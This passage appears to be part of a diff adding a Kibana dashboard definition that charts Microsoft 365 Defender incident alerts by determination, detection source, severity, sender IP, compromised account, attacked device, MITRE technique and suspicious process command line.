+ "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-45d80486-c9c8-4d28-bbcd-5d29072c9cb9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "57b64179-81e7-4d61-b50b-23d21323b9da", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "45d80486-c9c8-4d28-bbcd-5d29072c9cb9": { + "columnOrder": [ + "fe4ba4cc-3a4f-4dbf-b79d-a3b6550f08b6", + "4315d7e5-cdd4-48a1-b1b6-cfb3cfe25389" + ], + "columns": { + "4315d7e5-cdd4-48a1-b1b6-cfb3cfe25389": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "fe4ba4cc-3a4f-4dbf-b79d-a3b6550f08b6": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Determination", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "4315d7e5-cdd4-48a1-b1b6-cfb3cfe25389", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "m365_defender.incident.alert.determination" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "57b64179-81e7-4d61-b50b-23d21323b9da", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "4315d7e5-cdd4-48a1-b1b6-cfb3cfe25389" + ], + "layerId": "45d80486-c9c8-4d28-bbcd-5d29072c9cb9", + "layerType": "data", + "seriesType": "bar_stacked", + "xAccessor": "fe4ba4cc-3a4f-4dbf-b79d-a3b6550f08b6" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "8b6e0921-d74d-4fc1-83f4-04b15f37bef0", + "w": 24, + "x": 24, + "y": 105 + }, + "panelIndex": "8b6e0921-d74d-4fc1-83f4-04b15f37bef0", + "title": "Distribution of Alerts by Determination [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-24cc5824-23e2-462f-b38f-4769ea95322a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7a5d204e-cb61-4c0d-8923-28afeb2927a2", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "24cc5824-23e2-462f-b38f-4769ea95322a": { + "columnOrder": [ + "901ba472-02eb-4500-9ead-77371aa87f8c", + "4cccf049-88f6-486d-9cab-de68dd15ec01" + ], + "columns": { + "4cccf049-88f6-486d-9cab-de68dd15ec01": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "901ba472-02eb-4500-9ead-77371aa87f8c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Detection Source", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "4cccf049-88f6-486d-9cab-de68dd15ec01", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "m365_defender.incident.alert.detection_source" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "7a5d204e-cb61-4c0d-8923-28afeb2927a2", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "901ba472-02eb-4500-9ead-77371aa87f8c", + "isTransposed": false + }, + { + "columnId": "4cccf049-88f6-486d-9cab-de68dd15ec01", + "isTransposed": false + } + ], + "layerId": "24cc5824-23e2-462f-b38f-4769ea95322a", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "2c9ca03f-7301-4749-9825-4b7871d90b21", + "w": 24, + "x": 0, + "y": 120 + }, + "panelIndex": "2c9ca03f-7301-4749-9825-4b7871d90b21", + "title": "Top 10 Detection Source that identified most of the Alerts [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a0e68595-3ccc-4ff9-90fb-8087bc439020", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "742836c8-3532-4e18-b067-26e3af1b0e3b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "438f3787-c321-45a5-9cca-89571591b016", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a0e68595-3ccc-4ff9-90fb-8087bc439020": { + "columnOrder": [ + "d8c5d781-6442-4a9f-b91b-8b7b29d8e73a", + "2c72b146-36c7-4143-baba-517b19d159bc" + ], + "columns": { + "2c72b146-36c7-4143-baba-517b19d159bc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "d8c5d781-6442-4a9f-b91b-8b7b29d8e73a": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Email Sender IP", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "2c72b146-36c7-4143-baba-517b19d159bc", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "m365_defender.incident.alert.evidence.sender_ip" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "742836c8-3532-4e18-b067-26e3af1b0e3b", + "key": "m365_defender.incident.alert.evidence.verdict", + "negate": false, + "params": [ + "malicious", + "suspicious" + ], + "type": "phrases", + "value": [ + "malicious", + "suspicious" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "m365_defender.incident.alert.evidence.verdict": "malicious" + } + }, + { + "match_phrase": { + "m365_defender.incident.alert.evidence.verdict": "suspicious" + } + } + ] + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "438f3787-c321-45a5-9cca-89571591b016", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "d8c5d781-6442-4a9f-b91b-8b7b29d8e73a", + "isTransposed": false + }, + { + "columnId": "2c72b146-36c7-4143-baba-517b19d159bc", + "isTransposed": false + } + ], + "layerId": "a0e68595-3ccc-4ff9-90fb-8087bc439020", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "1a124e55-d897-4528-ad07-033d238e7460", + "w": 24, + "x": 24, + "y": 120 + }, + "panelIndex": "1a124e55-d897-4528-ad07-033d238e7460", + "title": "Top 10 Email Sender IP with Suspicious or Malicious Verdict [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-32a410b6-1ed8-4397-ab2e-151edec25e80", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "dbc8860d-394c-46cb-a626-67a20c1862c8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "32a410b6-1ed8-4397-ab2e-151edec25e80": { + "columnOrder": [ + "e278fc5e-3a46-416d-be86-884554b160dc", + "9c52de5e-c802-4a77-8cb4-b60368976cd9", + "43b50fb7-eed1-4a62-bd34-4922fa34c64e" + ], + "columns": { + "43b50fb7-eed1-4a62-bd34-4922fa34c64e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "9c52de5e-c802-4a77-8cb4-b60368976cd9": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Severity", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "43b50fb7-eed1-4a62-bd34-4922fa34c64e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 6 + }, + "scale": "ordinal", + "sourceField": "m365_defender.incident.alert.severity" + }, + "e278fc5e-3a46-416d-be86-884554b160dc": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "m365_defender.incident.alert.last_update_datetime" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "dbc8860d-394c-46cb-a626-67a20c1862c8", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "43b50fb7-eed1-4a62-bd34-4922fa34c64e" + ], + "layerId": "32a410b6-1ed8-4397-ab2e-151edec25e80", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "9c52de5e-c802-4a77-8cb4-b60368976cd9", + "xAccessor": "e278fc5e-3a46-416d-be86-884554b160dc" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "80ad6adc-885a-471b-b9f1-ca6742177339", + "w": 24, + "x": 0, + "y": 135 + }, + "panelIndex": "80ad6adc-885a-471b-b9f1-ca6742177339", + "title": "Alert Severity Over Time [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d2d7332c-5fbd-4acc-bef9-a1f2a2a6a25d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "be5d6d70-2d76-4b3c-bc34-c27a83b81991", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d2d7332c-5fbd-4acc-bef9-a1f2a2a6a25d": { + "columnOrder": [ + "f65e2e2e-1d06-4965-871e-0c559e325343", + "26cd4cd0-0825-47aa-932b-e620a6329167" + ], + "columns": { + "26cd4cd0-0825-47aa-932b-e620a6329167": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "f65e2e2e-1d06-4965-871e-0c559e325343": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "m365_defender.incident.alert.last_update_datetime" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "be5d6d70-2d76-4b3c-bc34-c27a83b81991", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "26cd4cd0-0825-47aa-932b-e620a6329167" + ], + "layerId": "d2d7332c-5fbd-4acc-bef9-a1f2a2a6a25d", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "f65e2e2e-1d06-4965-871e-0c559e325343" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "e81b4ea3-793d-4827-a77a-df2c9bf006d5", + "w": 24, + "x": 24, + "y": 135 + }, + "panelIndex": "e81b4ea3-793d-4827-a77a-df2c9bf006d5", + "title": "Count of Alerts Over Time [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-bf6ca0e6-4c26-4cff-b35c-a1a578a38d20", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "bfd73a62-e6c5-4126-9065-f4b17a1e4680", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "108199c0-a675-4fe1-87a9-4599aa85db91", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bf6ca0e6-4c26-4cff-b35c-a1a578a38d20": { + "columnOrder": [ + "7048d5d3-a8bc-4b71-8b79-e51c6adc0350", + "471be050-ea96-4ce7-8cef-00ca90e6fbed" + ], + "columns": { + "471be050-ea96-4ce7-8cef-00ca90e6fbed": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "7048d5d3-a8bc-4b71-8b79-e51c6adc0350": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "User Account", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "471be050-ea96-4ce7-8cef-00ca90e6fbed", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "m365_defender.incident.alert.evidence.user_account.account_name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "bfd73a62-e6c5-4126-9065-f4b17a1e4680", + "key": "m365_defender.incident.alert.evidence.roles", + "negate": false, + "params": { + "query": "compromised" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "m365_defender.incident.alert.evidence.roles": "compromised" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "108199c0-a675-4fe1-87a9-4599aa85db91", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "7048d5d3-a8bc-4b71-8b79-e51c6adc0350", + "isTransposed": false + }, + { + "columnId": "471be050-ea96-4ce7-8cef-00ca90e6fbed", + "isTransposed": false + } + ], + "layerId": "bf6ca0e6-4c26-4cff-b35c-a1a578a38d20", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "a6c60337-0230-4d71-90d6-fcbf09ca19bb", + "w": 24, + "x": 0, + "y": 150 + }, + "panelIndex": "a6c60337-0230-4d71-90d6-fcbf09ca19bb", + "title": "Top 10 User Account with Compromised Role [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-5b675bca-2096-430a-ac1e-6a435a5c3e34", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "75891f9a-3458-40d6-8d3c-63de61fb3f7d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "5b675bca-2096-430a-ac1e-6a435a5c3e34": { + "columnOrder": [ + "d04bf6a5-66f9-4899-a4d1-e2c4ec7d4b74", + "f37bb823-c831-497e-8d7e-8c00acbc11ff" + ], + "columns": { + "d04bf6a5-66f9-4899-a4d1-e2c4ec7d4b74": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Mitre Technique", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "f37bb823-c831-497e-8d7e-8c00acbc11ff", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.technique.subtechnique.id" + }, + "f37bb823-c831-497e-8d7e-8c00acbc11ff": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "75891f9a-3458-40d6-8d3c-63de61fb3f7d", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "f37bb823-c831-497e-8d7e-8c00acbc11ff", + "isTransposed": false + }, + { + "columnId": "d04bf6a5-66f9-4899-a4d1-e2c4ec7d4b74", + "isTransposed": false + } + ], + "layerId": "5b675bca-2096-430a-ac1e-6a435a5c3e34", + "layerType": "data", + "paging": { + "enabled": true, + "size": 10 + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "d7865055-20d9-4c1f-a0c2-4ddcd73a849d", + "w": 24, + "x": 24, + "y": 150 + }, + "panelIndex": "d7865055-20d9-4c1f-a0c2-4ddcd73a849d", + "title": "Top Mitre Techniques [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6e6323ee-5d54-4720-85b5-f567b8ef9d21", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "dd37b426-93bd-4376-8f4d-831cfa0673d8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5bd954c2-632c-40c9-a72f-47d8ed59a63b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6e6323ee-5d54-4720-85b5-f567b8ef9d21": { + "columnOrder": [ + "0f49f90e-0cbc-4ae0-b24d-0c82dc7c9d3b", + "5dea6d18-051a-4715-9327-3d30bb020a87" + ], + "columns": { + "0f49f90e-0cbc-4ae0-b24d-0c82dc7c9d3b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Device ID", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "5dea6d18-051a-4715-9327-3d30bb020a87", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.id" + }, + "5dea6d18-051a-4715-9327-3d30bb020a87": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "dd37b426-93bd-4376-8f4d-831cfa0673d8", + "key": "m365_defender.incident.alert.evidence.roles", + "negate": false, + "params": { + "query": "attacked" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "m365_defender.incident.alert.evidence.roles": "attacked" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "5bd954c2-632c-40c9-a72f-47d8ed59a63b", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "0f49f90e-0cbc-4ae0-b24d-0c82dc7c9d3b", + "isTransposed": false + }, + { + "columnId": "5dea6d18-051a-4715-9327-3d30bb020a87", + "isTransposed": false + } + ], + "layerId": "6e6323ee-5d54-4720-85b5-f567b8ef9d21", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "57c437df-b2a8-40de-b8c5-26fadf2b3140", + "w": 24, + "x": 0, + "y": 165 + }, + "panelIndex": "57c437df-b2a8-40de-b8c5-26fadf2b3140", + "title": "Top 10 Most Attacked Device [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-3f509783-a68e-46a5-a9ea-6c51a0bcf036", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "eaea7ed4-6b0d-4522-8e92-34b831024614", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8d4d1674-3434-45ae-b1f9-83b5c02ea1b3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "3f509783-a68e-46a5-a9ea-6c51a0bcf036": { + "columnOrder": [ + "3f1e354e-7c22-434e-9a0d-22e8b81f63b5", + "82a086d9-d047-4bc2-a791-c13d1f056f9c" + ], + "columns": { + "3f1e354e-7c22-434e-9a0d-22e8b81f63b5": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process Commands", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "82a086d9-d047-4bc2-a791-c13d1f056f9c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "process.command_line" + }, + "82a086d9-d047-4bc2-a791-c13d1f056f9c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "eaea7ed4-6b0d-4522-8e92-34b831024614", + "key": "m365_defender.incident.alert.evidence.verdict", + "negate": false, + "params": [ + "malicious", + "suspicious" + ], + "type": "phrases", + "value": [ + "malicious", + "suspicious" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "m365_defender.incident.alert.evidence.verdict": "malicious" + } + }, + { + "match_phrase": { + "m365_defender.incident.alert.evidence.verdict": "suspicious" + } + } + ] + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "8d4d1674-3434-45ae-b1f9-83b5c02ea1b3", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "3f1e354e-7c22-434e-9a0d-22e8b81f63b5", + "isTransposed": false + }, + { + "columnId": "82a086d9-d047-4bc2-a791-c13d1f056f9c", + "isTransposed": false + } + ], + "layerId": "3f509783-a68e-46a5-a9ea-6c51a0bcf036", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "6093d81b-dac2-417b-98cb-5531284af94f", + "w": 24, + "x": 24, + "y": 165 + }, + "panelIndex": "6093d81b-dac2-417b-98cb-5531284af94f", + "title": "Top 10 Process Commands with Suspicious or Malicious Verdict [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 17, + "i": "b4755871-88ae-45f2-813c-dbe4ca1cc54b", + "w": 48, + "x": 0, + "y": 180 + }, + "panelIndex": "b4755871-88ae-45f2-813c-dbe4ca1cc54b", + "panelRefName": "panel_b4755871-88ae-45f2-813c-dbe4ca1cc54b", + "type": "search", + "version": "8.7.1" + } + ], + "timeRestore": false, + "title": "[Logs Microsoft 365 Defender] Incident", + "version": 1 + }, + "coreMigrationVersion": "8.7.1", + "created_at": "2024-01-22T11:50:13.514Z", + "id": "m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06", + "migrationVersion": { + "dashboard": "8.7.0" + }, + "references": [ + { + "id": "logs-*", + "name": "0bc0ee87-64be-46bf-89ac-3a3c17f3ab7e:indexpattern-datasource-layer-961a470c-6271-4d2f-b553-646b67834136", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0bc0ee87-64be-46bf-89ac-3a3c17f3ab7e:22e1bd27-885c-4745-b12d-9381e438538f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4b49a572-a243-4c87-bea9-d0531d9dbd5a:indexpattern-datasource-layer-6ddc53cd-2bbd-4616-837b-3fbe0712ca7e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4b49a572-a243-4c87-bea9-d0531d9dbd5a:4dc6b906-d0f7-4c34-b48b-055f291cfc90", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "09a42be0-f530-4662-a284-5ad7d3264935:indexpattern-datasource-layer-19999c0c-be9d-43ba-994a-72fadb61fabc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "09a42be0-f530-4662-a284-5ad7d3264935:c2e6011b-e248-4de4-8701-18029063d0ce", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b2cc378e-bce4-4769-9778-2f7f4fcb0f9b:indexpattern-datasource-layer-f41e1d1a-0dc1-4416-b48b-a04c4e59d46c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b2cc378e-bce4-4769-9778-2f7f4fcb0f9b:20ea0ba5-f3a2-45a8-8af1-00ccb757801f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e8dcdb05-dc55-4c3d-ba79-d043d3987e53:indexpattern-datasource-layer-a3705125-6c5c-43a6-a594-6d384c293ec9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e8dcdb05-dc55-4c3d-ba79-d043d3987e53:a77281bd-3237-4d8d-b908-18a4a562b070", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 